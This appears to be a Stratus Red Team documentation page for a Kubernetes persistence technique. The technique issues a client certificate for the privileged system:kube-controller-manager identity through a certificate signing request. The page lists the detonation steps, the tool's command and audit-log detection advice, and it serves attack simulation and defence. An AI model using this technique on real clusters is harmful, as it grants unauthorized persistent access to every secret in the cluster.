Skip to content

Create Client Certificate Credential

idempotent

Platform: Kubernetes

MITRE ATT&CK Tactics

  • Persistence

Description

Creates a client certificate for a privileged user. This client certificate can be used to authenticate to the cluster.

Warm-up: None

Detonation:

  • Create a certificate signing request (CSR)
  • Wait for the CSR to be picked up and return a certificate
  • Print the client-side certificate and private key

Note: This attack technique does not succeed on AWS EKS. Due to apparent undocumented behavior, the managed EKS control plane does not issue a certificate for the certificate signing request (CSR), even when approved. However, it is still relevant to simulate attacker behavior.

Note: The certificate is issued to system:kube-controller-manager because it exists in most clusters, and already has a ClusterRoleBinding to ClusterRole/system:kube-controller-manager which includes privileged permissions, such as access all secrets of the cluster and create tokens for any service account.

Instructions

Detonate with Stratus Red Team
stratus detonate k8s.persistence.create-client-certificate

Detection

Using Kubernetes API server audit logs. In particular, look for creation and approval of CSR objects, which do not relate to standard cluster operation (e.g. Kubelet certificate issuance).